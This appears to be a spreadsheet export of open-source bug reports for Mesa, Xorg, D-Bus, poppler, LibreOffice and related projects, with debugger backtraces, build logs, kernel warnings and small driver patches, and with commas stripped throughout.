    <t>I've enabled the GLSL code in the r300 driver which seems to mostly work except
for a segfault in grammar.c and update_input_ptrs (tnl/t_vertex.c:387)
I fixed the grammar.c segfault though I'm not sure my solution is the best or
correct one... I'm not sure what's causing the segfault in update_input_ptrs
though.
Here is the GDB backtrace and the diff against Mesa CVS (minus the changes I
made in glslnoise.c which are just printf's before each gl call.)
If anyone knows a better way to enable the GLSL code or has actually managed to
get it working (with or without acceleration) I'd like to look at a diff or any
information about this.
z3ro@opteron ~/Mesa/progs/demos $ R300_SPAN_DISABLE_LOCKING=1 gdb ./glslnoise
GNU gdb 6.4
Copyright 2005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x86_64-pc-linux-gnu...Using host libthread_db
library /lib/libthread_db.so.1.
(gdb) run
Starting program: /home/z3ro/Mesa/progs/demos/glslnoise 
[Thread debugging using libthread_db enabled]
[New Thread 47636194510064 (LWP 6121)]
glCreateShaderObjectARB
glShaderSourceARB
glCompileShaderARB
glCreateProgramObjectARB
glAttachObjectARB
glLinkProgramARB
glUseProgramObjectARB
glGetUniformLocationARB
glUniform1fARB
glShaderSourceARB
glCompileShaderARB
glShaderSourceARB
glCompileShaderARB
glAttachObjectARB
glAttachObjectARB
glLinkProgramARB
glUseProgramObjectARB
glClearColor
glEnable
glEnable
GL_RENDERER = Mesa DRI R300 20040924 AGP 1x TCL
glViewport
glMatrixMode
glLoadIdentity
glFrustum
glMatrixMode
glLoadIdentity
glTranslatef
glClear
glUniform1fARB
glPushMatrix
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 47636194510064 (LWP 6121)]
0x00002b532a82a620 in update_input_ptrs (ctx=0x0 start=0) at tnl/t_vertex.c:387
387           a[j].inputptr = ((GLubyte *)vptr-&gt;data) + start * vptr-&gt;stride
(gdb) bt
#0  0x00002b532a82a620 in update_input_ptrs (ctx=0x0 start=0) at
tnl/t_vertex.c:387 #1  0x00002b532a82a6de in _tnl_build_vertices (ctx=0x51dd50
start=0 end=341 newinputs=0) at tnl/t_vertex.c:409 #2  0x00002b532a81c73c in
run_render (ctx=0x51dd50 stage=0x0) at tnl/t_vb_render.c:290 #3 
0x00002b532a80ca64 in _tnl_run_pipeline (ctx=0x51dd50) at tnl/t_pipeline.c:159 #4
 0x00002b532a834863 in _tnl_flush_vtx (ctx=0x51dd50) at tnl/t_vtx_exec.c:281 #5 
0x00002b532a82d712 in _tnl_wrap_buffers (ctx=0x51dd50) at tnl/t_vtx_api.c:85 #6 
0x00002b532a82d7c6 in _tnl_wrap_filled_vertex (ctx=0x0) at tnl/t_vtx_api.c:122 #7
 0x00002b532a83046a in attrib_0_3 (v=0x7fff81e5fda0) at tnl/t_vtx_generic.c:100
#8  0x00002b532a8327aa in _tnl_Vertex3f (x=0 y=1 z=0) at
tnl/t_vtx_generic.c:235 #9  0x00002b53290766f8 in glVertex3f (x=0.190983027
y=0.587785363 z=-1.90211296) at glapitemp.h:755 #10 0x00002b5328edd671 in
gluSphere (qobj=0xbea5f0 radius=2 slices=20 stacks=-1076945986) at
libutil/quad.c:992 #11 0x00002b5328d8923a in glutSolidSphere (radius=2
slices=20 stacks=10) at glut_shapes.c:89 #12 0x0000000000401442 in Redisplay ()
at glslnoise.c:55 #13 0x00002b5328d82a33 in processWindowWorkList
(window=0x509640) at glut_event.c:1302 #14 0x00002b5328d82ad1 in
__glutProcessWindowWorkLists () at glut_event.c:1349 #15 0x00002b5328d82b2f in
glutMainLoop () at glut_event.c:1370 #16 0x0000000000401972 in main (argc=1
argv=0x7fff81e62e18) at glslnoise.c:214 (gdb) 
Index: src/mesa/drivers/dri/r300/r300_context.c
===================================================================
RCS file: /cvs/mesa/Mesa/src/mesa/drivers/dri/r300/r300_context.cv
retrieving revision 1.54
diff -u -r1.54 r300_context.c
--- src/mesa/drivers/dri/r300/r300_context.c	11 Jun 2006 09:12:27 -0000	1.54
+++ src/mesa/drivers/dri/r300/r300_context.c	18 Jun 2006 11:26:06 -0000
@@ -839 +8320 @@
 #define need_GL_EXT_blend_equation_separate
 #define need_GL_EXT_blend_func_separate
 #define need_GL_NV_vertex_program
+
+#define need_GL_ARB_shader_objects
+#define need_GL_ARB_shading_language_100
+#define need_GL_ARB_vertex_shader
+#define need_GL_ARB_fragment_shader
+
 #include extension_helper.h
 const struct dri_extension card_extensions[] = {
+  {GL_ARB_shader_objects GL_ARB_shader_objects_functions}
+  {GL_ARB_shading_language_100 NULL}
+  {GL_ARB_vertex_shader GL_ARB_vertex_shader_functions}
+  {GL_ARB_fragment_shader GL_ARB_vertex_shader_functions}
+
   {GL_ARB_multisample		GL_ARB_multisample_functions}
   {GL_ARB_multitexture		NULL}
   {GL_ARB_texture_border_clamp	NULL}
Index: src/mesa/drivers/dri/r300/r300_render.c
===================================================================
RCS file: /cvs/mesa/Mesa/src/mesa/drivers/dri/r300/r300_render.cv
retrieving revision 1.106
diff -u -r1.106 r300_render.c
--- src/mesa/drivers/dri/r300/r300_render.c	23 Apr 2006 08:04:50 -0000	1.106
+++ src/mesa/drivers/dri/r300/r300_render.c	18 Jun 2006 11:26:22 -0000
@@ -4626 +46211 @@
 {
 	int i
+	if (ctx-&gt;ShaderObjects._FragmentShaderPresent)
+		return R300_FALLBACK_RAST
+	if (ctx-&gt;ShaderObjects._VertexShaderPresent)
+		return R300_FALLBACK_TCL
+
 	FALLBACK_IF(ctx-&gt;RenderMode != GL_RENDER)  // We do not do SELECT or FEEDBACK
(yet ?)  	
 #if 0 /* These should work now.. */
Index: src/mesa/shader/grammar/grammar.c
===================================================================
RCS file: /cvs/mesa/Mesa/src/mesa/shader/grammar/grammar.cv
retrieving revision 1.3
diff -u -r1.3 grammar.c
--- src/mesa/shader/grammar/grammar.c	28 Jul 2005 00:11:11 -0000	1.3
+++ src/mesa/shader/grammar/grammar.c	18 Jun 2006 11:37:52 -0000
@@ -24107 +24107 @@
                     }
                     else if (result == mr_matched)
                     {
-                        if (barray_push (ba sp-&gt;m_emits text[ind - 1]
save_ind &amp;ctx) || +                        if (barray_push (ba sp-&gt;m_emits
text[ind &gt; 0 ? ind - 1 : ind] save_ind &amp;ctx) ||                             
barray_append (ba &amp;array))                          {
                             free_regbyte_ctx_stack (ctx *rbc)
@@ -24697 +24697 @@
         if (status == mr_matched)
         {
             if (sp-&gt;m_emits)
-                if (barray_push (ba sp-&gt;m_emits text[ind - 1] save_ind
&amp;ctx)) +                if (barray_push (ba sp-&gt;m_emits text[ind &gt; 0 ? ind - 1
: ind] save_ind &amp;ctx))                  {
                     free_regbyte_ctx_stack (ctx *rbc)
                     barray_destroy (
@@ -26297 +26297 @@
                         {
                             if (sp-&gt;m_emits != NULL)
                             {
-                                if (emit_push (sp-&gt;m_emits _BP-&gt;_F + _P
text[ind - 1] save_ind &amp;ctx)) +                                if (emit_push
(sp-&gt;m_emits _BP-&gt;_F + _P text[ind &gt; 0 ? ind - 1 : ind] save_ind &amp;ctx))      
                           {                                     
free_regbyte_ctx_stack (ctx *rbc)                                      return
mr_internal_error @@ -26867 +26867 @@
         if (status == mr_matched)
         {
             if (sp-&gt;m_emits != NULL)
-                if (emit_push (sp-&gt;m_emits _BP-&gt;_F + _P text[ind - 1]
save_ind &amp;ctx)) +                if (emit_push (sp-&gt;m_emits _BP-&gt;_F + _P
text[ind &gt; 0 ? ind - 1 : ind] save_ind &amp;ctx))                  {
                     free_regbyte_ctx_stack (ctx *rbc)
                     return mr_internal_error</t>
  </si>
  <si>
    <t>MESA-28071</t>
  </si>
  <si>
    <t>undefined reference to `__egl InitDriverFallbacks'</t>
  </si>
  <si>
    <t>mesa: edbc302ad678e1a4a8803ba0e827a13dd27105d2 (master)
$ ./autogen.sh
$ make
...
make[4]: Entering directory `/home/vlee/mesa/src/mesa/drivers/x11'
mklib: Making CYGWIN_NT-5.1 shared library:  cygGL-1.dll
Creating library file: libGL-1.dll.a
mklib: Installing libGL-1.dll.a libGL.dll.a in ../../../../lib
make[4]: Leaving directory `/home/vlee/mesa/src/mesa/drivers/x11'
make[4]: Entering directory `/home/vlee/mesa/src/mesa/drivers/osmesa'
/bin/sh ../../../../bin/mklib -o OSMesa -linker 'gcc' -ldflags '' \
                -major 7 -minor 9 -patch 0 \
                -install ../../../../lib  \
                -id /usr/local/lib/libOSMesa.7.dylib \
                -L../../../../lib -lGL   osmesa.o
mklib: Making CYGWIN_NT-5.1 shared library:  cygOSMesa-7.dll
Creating library file: libOSMesa-7.dll.a
mklib: Installing libOSMesa-7.dll.a libOSMesa.dll.a in ../../../../lib
make[4]: Leaving directory `/home/vlee/mesa/src/mesa/drivers/osmesa'
make[3]: Leaving directory `/home/vlee/mesa/src/mesa/drivers'
make[2]: Leaving directory `/home/vlee/mesa/src/mesa'
make[2]: Entering directory `/home/vlee/mesa/src/glew'
make[2]: Nothing to be done for `default'.
make[2]: Leaving directory `/home/vlee/mesa/src/glew'
make[2]: Entering directory `/home/vlee/mesa/src/egl'
make[3]: Entering directory `/home/vlee/mesa/src/egl/main'
/bin/sh ../../../bin/mklib -o EGL -linker 'gcc' -ldflags '' \
                -major 1 -minor 0 \
                -install ../../../lib  \
                  -lpthread eglapi.o eglconfig.o eglconfigutil.o eglcontext.o eg
lcurrent.o egldisplay.o egldriver.o eglglobals.o eglimage.o egllog.o eglmisc.o e
glmode.o eglscreen.o eglstring.o eglsurface.o
mklib: Making CYGWIN_NT-5.1 shared library:  cygEGL-1.dll
Creating library file: libEGL-1.dll.a
mklib: Installing libEGL-1.dll.a libEGL.dll.a in ../../../lib
make[3]: Leaving directory `/home/vlee/mesa/src/egl/main'
make[3]: Entering directory `/home/vlee/mesa/src/egl/drivers'
make[4]: Entering directory `/home/vlee/mesa/src/egl/drivers/glx'
mklib: Making CYGWIN shared library:  egl_glx.so
egl_glx.o: In function `_eglMain':
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:923: undefined reference to `__egl
InitDriverFallbacks'
egl_glx.o: In function `GLX_eglCreatePbufferSurface':
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:808: undefined reference to `__egl
InitSurface'
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:804: undefined reference to `__egl
Error'
egl_glx.o: In function `GLX_eglCreatePixmapSurface':
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:748: undefined reference to `__egl
InitSurface'
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:744: undefined reference to `__egl
Error'
egl_glx.o: In function `GLX_eglCreateWindowSurface':
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:702: undefined reference to `__egl
InitSurface'
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:698: undefined reference to `__egl
Error'
egl_glx.o: In function `GLX_eglMakeCurrent':
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:645: undefined reference to `__egl
BindContext'
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:664: undefined reference to `__egl
BindContext'
egl_glx.o: In function `GLX_eglCreateContext':
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:587: undefined reference to `__egl
InitContext'
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:583: undefined reference to `__egl
Error'
egl_glx.o: In function `GLX_eglTerminate':
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:553: undefined reference to `__egl
ReleaseDisplayResources'
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:554: undefined reference to `__egl
CleanupDisplay'
egl_glx.o: In function `create_configs':
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:404: undefined reference to `__egl
InitConfig'
egl_glx.o: In function `convert_fbconfig':
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:220: undefined reference to `__egl
ConfigFromContextModesRec'
egl_glx.o: In function `create_configs':
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:413: undefined reference to `__egl
ValidateConfig'
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:414: undefined reference to `__egl
Log'
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:423: undefined reference to `__egl
AddConfig'
egl_glx.o: In function `convert_visual':
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:340: undefined reference to `__egl
ConfigFromContextModesRec'
egl_glx.o: In function `check_quirks':
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:484: undefined reference to `__egl
Log'
egl_glx.o: In function `GLX_eglInitialize':
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:516: undefined reference to `__egl
Log'
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:528: undefined reference to `__egl
Log'
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:509: undefined reference to `__egl
Log'
egl_glx.o: In function `GLX_eglWaitNative':
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:898: undefined reference to `__egl
Error'
egl_glx.o: In function `GLX_eglInitialize':
/home/vlee/mesa/src/egl/drivers/glx/egl_glx.c:503: undefined reference to `__egl
Error'
collect2: ld returned 1 exit status
/usr/bin/install -c egl_glx.so ../../../../lib/egl
/usr/bin/install: cannot stat `egl_glx.so': No such file or directory
make[4]: *** [../../../../lib/egl/egl_glx.so] Error 1
make[4]: Leaving directory `/home/vlee/mesa/src/egl/drivers/glx'</t>
  </si>
  <si>
    <t>MESA-27840</t>
  </si>
  <si>
    <t>Enable mesa to be built for Cygwin -with-driver=dri</t>
  </si>
  <si>
    <t>Various changes to enable mesa to be built for Cygwin -with-driver=dri rather than -with-driver=xlib so that AIGLX can be used.
1) Make XF86VIDMODE extension optional
2) Don't require LIBDRM on Cygwin and build with GLX_INDIRECT_RENDERING only
3) Make DRI2PROTO optional in a GLX_INDIRECT_RENDERING only build</t>
  </si>
  <si>
    <t>WAYLAND-104986</t>
  </si>
  <si>
    <t>Palm detection on Intuos Paper not working</t>
  </si>
  <si>
    <t>Needs a palm threshold of ~5 to detect based on touch size we don't have anything else we can hook onto.
The current code requires use_touch_size enabled to activate palm size but that shouldn't be necessary for this device - our lower threshold is 0 here.
And palm detection doesn't kick in on this device because it's an external touchpad. Need to extend this to cater for tablet touch devices.
Arguably having better touch arbitration here (Bug 104985) would work too but only for the proximity-out scenario not necessarily for the proximity-in scenario.</t>
  </si>
  <si>
    <t>DBUS-98191</t>
  </si>
  <si>
    <t>Fix -Wswitch-enum -Wswitch-default warnings</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #97357 +++
The patches on Bug #97357 include some for -Wswitch-enum and -Wswitch-default (Attachment #127058 Attachment #127059).
To make this more reviewable I would prefer to fix these two warnings as a unit but with each commit doing one thing by following this process:
* Land what's on Bug #97357 or use my warnings branch on Github as a base
* Enable the warnings locally but do not make them fatal by building with
  make CFLAGS=-Wswitch-enum -Wswitch-default -Wno-error=switch-enum -Wno-error=switch-default
* Go through each affected switch or closely related group of switches
  (for example switching over values of the same enum can probably be
  grouped) fix both warnings at the same time and do one commit
  per group
* After all those commits add one commit removing -Wno-switch-enum and
  -Wno-switch-default from the AX_COMPILER_FLAGS* arguments so that this
  doesn't regress in future
I hope that makes sense.</t>
  </si>
  <si>
    <t>XORG-34240</t>
  </si>
  <si>
    <t>Raw events include a source ID</t>
  </si>
  <si>
    <t>XI2 protocol raw events do not provide a sourceid the libXi header however does. This value is always 0.
This is likely caused by a copy/paste bug and sourceid shouldn't be in the interface here. However Xlib is set in stone and we can't remove it so maybe adding it to the server is the best idea.</t>
  </si>
  <si>
    <t>PACKAGEKIT-17808</t>
  </si>
  <si>
    <t>Does not show error reports in case of a failed installation</t>
  </si>
  <si>
    <t>If the installation fails gpk-application does not show an error dialog.</t>
  </si>
  <si>
    <t>XDGMIME-5419</t>
  </si>
  <si>
    <t>xdgmime doesn't know 3gp format</t>
  </si>
  <si>
    <t>You may add 3gp like video format. 
A KDE developper said me to post this in xdgmine : 
http://bugs.kde.org/show_bug.cgi?id=118978 
I will add my 3gp mimetype file.</t>
  </si>
  <si>
    <t>ludo.gml</t>
  </si>
  <si>
    <t>XORG-89485</t>
  </si>
  <si>
    <t>Can't completely disable acceleration/deceleration</t>
  </si>
  <si>
    <t>When setting Option AccelSpeed -1 I still experience what I think is adaptive deceleration. When moving the mouse very slowly the pointer starts moving even slower. 
I'd like to be able to completely disable acceleration/deceleration. I can achieve the desired effect with evdev using:
Option AccelerationProfile -1
Option AccelerationScheme none</t>
  </si>
  <si>
    <t>lulz</t>
  </si>
  <si>
    <t>POPPLER-15125</t>
  </si>
  <si>
    <t>pdf with jpg image work with acroread not with evince</t>
  </si>
  <si>
    <t>Created attachment 15291
pdf that shoes the error
Bug forwarded from Evince: http://bugzilla.gnome.org/show_bug.cgi?id=523313
Please describe the problem:
the attached pdf shows and prints correctly using Acrobat Reader ( all versions
so far ) but not using evince ( all versions I tried ) under various Fedora
versions ( 5678 )
Steps to reproduce:
1. open the attached pdf with evince and with acroread
2. 
3. 
Actual results:
Expected results:
evince should shows the image as acroread does
Does this happen every time?
yes
I can confirm the problem is reproducile with both cairo and splash backend.</t>
  </si>
  <si>
    <t>DRI-96419</t>
  </si>
  <si>
    <t>[SKL] vblank not available on crtc 0 ret=-22 (makes X freeze)</t>
  </si>
  <si>
    <t>I am using a kernel with drm-intel git (for-linux-next from 2016-06-01). Occasionally my X freezes and I am getting the following entries in my dmesg:
[34710.420115] ------------[ cut here ]------------
[34710.420139] WARNING: CPU: 2 PID: 465 at drivers/gpu/drm/drm_irq.c:1345 drm_wait_one_vblank+0x176/0x1c0 [drm]
[34710.420141] vblank not available on crtc 0 ret=-22
[34710.420194] Modules linked in: fuse sha256_ssse3 sha256_generic hmac drbg ansi_cprng ctr ccm nf_conntrack_ipv6 nf_defrag_ipv6 ip6table_filter ip6_tables ipt_REJECT nf_reject_ipv4 xt_tcpudp nf_conntrack_ipv4 nf_defrag_ipv4 xt_conntrack nf_conntrack iptable_filter snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_codec_generic snd_soc_skl snd_soc_skl_ipc snd_hda_ext_core snd_soc_sst_ipc snd_soc_sst_dsp snd_soc_sst_match snd_soc_core iTCO_wdt iTCO_vendor_support arc4 iwlmvm mac80211 snd_hda_intel intel_rapl x86_pkg_temp_thermal snd_hda_codec intel_powerclamp snd_hwdep coretemp snd_hda_core kvm uvcvideo videobuf2_vmalloc e1000e videobuf2_memops iwlwifi irqbypass snd_pcm videobuf2_v4l2 ptp videobuf2_core rtsx_pci_ms serio_raw psmouse pcspkr i2c_i801 snd_timer pps_core cfg80211 i915 videodev btusb btrtl
[34710.420245]  btbcm memstick btintel bluetooth shpchp media thinkpad_acpi mei_me mei joydev intel_pch_thermal nvram crc16 mousedev snd evdev input_leds soundcore mac_hid led_class intel_gtt thermal i2c_algo_bit wmi rfkill drm_kms_helper ac battery syscopyarea sysfillrect video sysimgblt fb_sys_fops tpm_crb button drm tpm_tis tpm processor sch_fq_codel ip_tables x_tables btrfs xor raid6_pq algif_skcipher af_alg hid_logitech_hidpp hid_logitech_dj usbhid dm_crypt dm_mod sd_mod rtsx_pci_sdmmc mmc_core atkbd libps2 crct10dif_pclmul crc32_pclmul ahci crc32c_intel libahci ghash_clmulni_intel libata xhci_pci rtsx_pci scsi_mod xhci_hcd i8042 serio hid_microsoft hid
[34710.420249] CPU: 2 PID: 465 Comm: Xorg Not tainted 4.6.1-git+ #3
[34710.420251] Hardware name: LENOVO 20FVS01500/20FVS01500 BIOS R08ET41W (1.15 ) 05/11/2016
[34710.420256]  0000000000000286 0000000095467b73 ffff880423cb76a0 ffffffff81302be2
[34710.420260]  ffff880423cb76f0 0000000000000000 ffff880423cb76e0 ffffffff8109a1cb
[34710.420264]  0000054123cb76a8 ffff88042adb2000 0000000000000000 ffff88042ada7800
[34710.420265] Call Trace:
[34710.420273]  [] dump_stack+0x63/0x81
[34710.420278]  [] __warn+0xcb/0xf0
[34710.420283]  [] warn_slowpath_fmt+0x5f/0x80
[34710.420295]  [] ? drm_vblank_get+0x74/0xd0 [drm]
[34710.420305]  [] drm_wait_one_vblank+0x176/0x1c0 [drm]
[34710.420341]  [] ? gen9_write16+0x3d0/0x3d0 [i915]
[34710.420362]  [] skl_update_wm+0x41a/0x560 [i915]
[34710.420384]  [] intel_update_watermarks+0x1e/0x20 [i915]
[34710.420417]  [] haswell_crtc_enable+0x765/0x8d0 [i915]
[34710.420450]  [] intel_atomic_commit+0x51e/0x1450 [i915]
[34710.420462]  [] ? drm_atomic_check_only+0x18d/0x610 [drm]
[34710.420472]  [] ? drm_atomic_set_crtc_for_connector+0x6c/0x110 [drm]
[34710.420483]  [] drm_atomic_commit+0x37/0x60 [drm]
[34710.420491]  [] restore_fbdev_mode+0x238/0x260 [drm_kms_helper]
[34710.420498]  [] drm_fb_helper_restore_fbdev_mode_unlocked+0x34/0x80 [drm_kms_helper]
[34710.420504]  [] drm_fb_helper_set_par+0x2d/0x50 [drm_kms_helper]
[34710.420532]  [] intel_fbdev_set_par+0x1a/0x60 [i915]
[34710.420536]  [] ? fb_set_var+0x30f/0x450
[34710.420538]  [] fb_set_var+0x250/0x450
[34710.420543]  [] ? update_curr+0xe5/0x1a0
[34710.420549]  [] ? set_next_entity+0x4e2/0x910
[34710.420554]  [] ? __enqueue_entity+0x6c/0x70
[34710.420557]  [] ? enqueue_entity+0x323/0xd70
[34710.420563]  [] fbcon_blank+0x363/0x3b0
[34710.420570]  [] do_unblank_screen+0xc2/0x190
[34710.420576]  [] complete_change_console+0x59/0xe0
[34710.420581]  [] vt_ioctl+0x709/0x12d0
[34710.420585]  [] ? do_wp_page+0x12c/0x710
[34710.420597]  [] ? drm_ioctl+0x18a/0x540 [drm]
[34710.420601]  [] tty_ioctl+0x365/0xc70
[34710.420606]  [] ? handle_mm_fault+0xa39/0x1ed0
[34710.420611]  [] do_vfs_ioctl+0xa3/0x5d0
[34710.420615]  [] ? __fget+0x77/0xb0
[34710.420620]  [] SyS_ioctl+0x79/0x90
[34710.420625]  [] entry_SYSCALL_64_fastpath+0x1a/0xa4
[34710.420628] ---[ end trace 780bbe753149c42d ]---
[34765.434165] ------------[ cut here ]------------
[34765.434190] WARNING: CPU: 3 PID: 465 at drivers/gpu/drm/drm_irq.c:1345 drm_wait_one_vblank+0x176/0x1c0 [drm]
[34765.434193] vblank not available on crtc 0 ret=-22
[34765.434258] Modules linked in: fuse sha256_ssse3 sha256_generic hmac drbg ansi_cprng ctr ccm nf_conntrack_ipv6 nf_defrag_ipv6 ip6table_filter ip6_tables ipt_REJECT nf_reject_ipv4 xt_tcpudp nf_conntrack_ipv4 nf_defrag_ipv4 xt_conntrack nf_conntrack iptable_filter snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_codec_generic snd_soc_skl snd_soc_skl_ipc snd_hda_ext_core snd_soc_sst_ipc snd_soc_sst_dsp snd_soc_sst_match snd_soc_core iTCO_wdt iTCO_vendor_support arc4 iwlmvm mac80211 snd_hda_intel intel_rapl x86_pkg_temp_thermal snd_hda_codec intel_powerclamp snd_hwdep coretemp snd_hda_core kvm uvcvideo videobuf2_vmalloc e1000e videobuf2_memops iwlwifi irqbypass snd_pcm videobuf2_v4l2 ptp videobuf2_core rtsx_pci_ms serio_raw psmouse pcspkr i2c_i801 snd_timer pps_core cfg80211 i915 videodev btusb btrtl
[34765.434324]  btbcm memstick btintel bluetooth shpchp media thinkpad_acpi mei_me mei joydev intel_pch_thermal nvram crc16 mousedev snd evdev input_leds soundcore mac_hid led_class intel_gtt thermal i2c_algo_bit wmi rfkill drm_kms_helper ac battery syscopyarea sysfillrect video sysimgblt fb_sys_fops tpm_crb button drm tpm_tis tpm processor sch_fq_codel ip_tables x_tables btrfs xor raid6_pq algif_skcipher af_alg hid_logitech_hidpp hid_logitech_dj usbhid dm_crypt dm_mod sd_mod rtsx_pci_sdmmc mmc_core atkbd libps2 crct10dif_pclmul crc32_pclmul ahci crc32c_intel libahci ghash_clmulni_intel libata xhci_pci rtsx_pci scsi_mod xhci_hcd i8042 serio hid_microsoft hid
[34765.434331] CPU: 3 PID: 465 Comm: Xorg Tainted: G        W       4.6.1-git+ #3
[34765.434333] Hardware name: LENOVO 20FVS01500/20FVS01500 BIOS R08ET41W (1.15 ) 05/11/2016
[34765.434340]  0000000000000286 0000000095467b73 ffff880423cb76a0 ffffffff81302be2
[34765.434345]  ffff880423cb76f0 0000000000000000 ffff880423cb76e0 ffffffff8109a1cb
[34765.434350]  0000054123cb76a8 ffff88042adb2000 0000000000000000 ffff88042ada7800
[34765.434351] Call Trace:
[34765.434361]  [] dump_stack+0x63/0x81
[34765.434368]  [] __warn+0xcb/0xf0
[34765.434374]  [] warn_slowpath_fmt+0x5f/0x80
[34765.434390]  [] ? drm_vblank_get+0x74/0xd0 [drm]
[34765.434404]  [] drm_wait_one_vblank+0x176/0x1c0 [drm]
[34765.434451]  [] ? gen9_write16+0x3d0/0x3d0 [i915]
[34765.434480]  [] skl_update_wm+0x41a/0x560 [i915]
[34765.434509]  [] intel_update_watermarks+0x1e/0x20 [i915]
[34765.434553]  [] haswell_crtc_enable+0x765/0x8d0 [i915]
[34765.434597]  [] intel_atomic_commit+0x51e/0x1450 [i915]
[34765.434613]  [] ? drm_atomic_check_only+0x18d/0x610 [drm]
[34765.434627]  [] ? drm_atomic_set_crtc_for_connector+0x6c/0x110 [drm]
[34765.434642]  [] drm_atomic_commit+0x37/0x60 [drm]
[34765.434652]  [] restore_fbdev_mode+0x238/0x260 [drm_kms_helper]
[34765.434661]  [] drm_fb_helper_restore_fbdev_mode_unlocked+0x34/0x80 [drm_kms_helper]
[34765.434670]  [] drm_fb_helper_set_par+0x2d/0x50 [drm_kms_helper]
[34765.434707]  [] intel_fbdev_set_par+0x1a/0x60 [i915]
[34765.434711]  [] ? fb_set_var+0x30f/0x450
[34765.434715]  [] fb_set_var+0x250/0x450
[34765.434721]  [] ? update_curr+0xe5/0x1a0
[34765.434729]  [] ? set_next_entity+0x4e2/0x910
[34765.434736]  [] ? __enqueue_entity+0x6c/0x70
[34765.434744]  [] fbcon_blank+0x363/0x3b0
[34765.434753]  [] do_unblank_screen+0xc2/0x190
[34765.434760]  [] complete_change_console+0x59/0xe0
[34765.434767]  [] vt_ioctl+0x709/0x12d0
[34765.434773]  [] ? do_wp_page+0x12c/0x710
[34765.434789]  [] ? drm_ioctl+0x18a/0x540 [drm]
[34765.434793]  [] tty_ioctl+0x365/0xc70
[34765.434800]  [] ? handle_mm_fault+0xa39/0x1ed0
[34765.434807]  [] do_vfs_ioctl+0xa3/0x5d0
[34765.434813]  [] ? __fget+0x77/0xb0
[34765.434819]  [] SyS_ioctl+0x79/0x90
[34765.434826]  [] entry_SYSCALL_64_fastpath+0x1a/0xa4
[34765.434830] ---[ end trace 780bbe753149c42e ]---
Environment:
- Thinkpad L460
- 3 Screens (eDP HDMI+DVI through dock)
- Arch Linux
Might be related to Bug 94572 and/or Bug 94992 I am opening a new bug just in case.</t>
  </si>
  <si>
    <t>direx</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-106627</t>
  </si>
  <si>
    <t>revoke drm-intel.git access given apparently in error</t>
  </si>
  <si>
    <t>Seems that Antonio Argenziano (user aargenzi) has been granted /git/drm-intel.git access in error. I don't know who this is and he's never contributed to the project AFAICT. Please revoke access.</t>
  </si>
  <si>
    <t>LIBREOFFICE-60662</t>
  </si>
  <si>
    <t>Adapt zoom dialog to HIG</t>
  </si>
  <si>
    <t>i.e. cui/uiconfig/ui/zoomdialog.ui
See https://wiki.documentfoundation.org/Development/WidgetLayout#Widgets_requiring_HIG_guidelines_review for details</t>
  </si>
  <si>
    <t>LIBREOFFICE-44281</t>
  </si>
  <si>
    <t>[FORMATTING] [TOC] Character style of [LS] and [LE] marks should be 'Index Link'</t>
  </si>
  <si>
    <t>Create a new document with some headings with 'Heading 1' 'Heading 2' and 'Heading 3' styles
Insert a TOC (Insert &gt; Indexes and Tables &gt; Indexes and Tables)
In the new TOC all entries will be underlined as a link because there are [LS] and [LE] marks with 'None' character style in the entry level structures of the TOC.
Have links in TOC is good! However the underline will appear in Page Preview and in the printed document.
I suggest that character style of [LS] and [LE] marks is changed from 'None' to 'Index Link' for all TOC levels. Using 'Index Link' style TOC keeps the link function and preserves the text formatting.
Thanks!
Gustavo Pacheco.</t>
  </si>
  <si>
    <t>MESA-29985</t>
  </si>
  <si>
    <t>KMS TV Issue + Possible fix</t>
  </si>
  <si>
    <t>Running an rv790 I haven't used s-vid TV for a while so am a month late noticing it had regressed on d-r-t.
Booting old kernels and then using git reset I found the guilty commit to be -
commit 5b1714d386a2f0c0d270e3abe1ac39ad1b0ba010
Author: Alex Deucher 
Date:   Tue Aug 3 19:59:20 2010 -0400
    drm/radeon/kms: enable underscan option for digital connectors
As it won't revert from d-r-t head I took a closer look and thought this bit to be suspicious -
@@ -117610 +11708 @@ int atombios_crtc_mode_set(struct drm_crtc *crtc
        atombios_crtc_set_pll(crtc adjusted_mode)
        atombios_enable_ss(crtc)
-       if (ASIC_IS_DCE4(rdev))
+       if (ASIC_IS_AVIVO(rdev))
                atombios_set_crtc_dtd_timing(crtc adjusted_mode)
-       else if (ASIC_IS_AVIVO(rdev))
-               atombios_crtc_set_timing(crtc adjusted_mode)
        else {
                atombios_crtc_set_timing(crtc adjusted_mode)
                if (radeon_crtc-&gt;crtc_id == 0)
So I edited by hand to swap back the atombios_crtc_set_timing for AVIVO and the other one for the rest -
diff --git a/drivers/gpu/drm/radeon/atombios_crtc.c b/drivers/gpu/drm/radeon/atombios_crtc.c
index 577239a..40ca121 100644
--- a/drivers/gpu/drm/radeon/atombios_crtc.c
+++ b/drivers/gpu/drm/radeon/atombios_crtc.c
@@ -12089 +12089 @@ int atombios_crtc_mode_set(struct drm_crtc *crtc
        atombios_enable_ss(crtc)
        if (ASIC_IS_AVIVO(rdev))
